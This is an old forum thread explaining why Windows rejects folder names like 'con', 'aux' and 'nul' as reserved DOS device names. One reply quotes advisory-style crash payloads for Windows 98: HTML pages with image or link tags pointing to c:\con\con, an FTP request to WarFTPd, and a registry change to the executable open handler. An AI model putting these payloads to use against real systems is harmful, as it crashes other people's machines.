I observed something weird. Windows doesn't allow to create a folder with the name 'con'. It cribs "The filename you specified is invalid or too long. Specify a different filename". Any idea why? Sudharsan [ September 30, 2003: Message edited by: Sudharsan G'rajan ]
Not only 'con', Windows wont let you create folders with names like 'aux', 'nul' etc either. I don't exactly know why, but I guess it has something to do with ftp or other services misunderstanding these folders as devices (for example 'con' is the default device name for console) HTH, Ashok. [ September 30, 2003: Message edited by: Ashok Mash ]
con, aux and prn stand for 'console', 'auxiliary' and 'printer' and stand for output devices. Leftovers from DOS where you could do 'copy con a.txt' and get whatever you typed in a textfile. Or 'copy a.txt prn' to send it to the first printer (if installed). Actually, those still work (at least con does) from a Windows command prompt to this day.
NUL, AUX, CON, COM1-4, LPT1-3, and PRN are reserved words used for DOS Devices
These are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:
CLOCK$ - System clock CON - Console; combination of keyboard and screen to handle input and output AUX or COM1 - First serial communicationport COMn - Second, Third, ... communicationport LPT1 or PRN - First parallel port NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null. CONFIG$ - Unknown
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).
Example: <HTML> <BODY> <A HREF="c:\con\con">crashing IE</A> <!-- or nul\nul, clock$\clock$ --> <!-- or aux\aux, config$\config$ --> </BODY> </HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value: c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example: <HTML> <BODY> <IMG SRC="c:\con\con"> <!-- or nul\nul, clock$\clock$ --> <!-- or aux\aux, config$\config$ --> </BODY> </HTML>
The story I heard was that there was a bug in DOS release 2. Devices were supposed to be indicated by devicename, colon, device properties (optional). However, due to a bug, the colon become, ahem, "optional". And a lot of people abused the option and there was no going back.
What's bad about that, is that one day I discovered a file named "PRN" in a directory and Windows wouldn't let it be deleted. It was there polluting the directory forever after.
Sources may include data from the Fakebook Research Foundation with support from Gargle University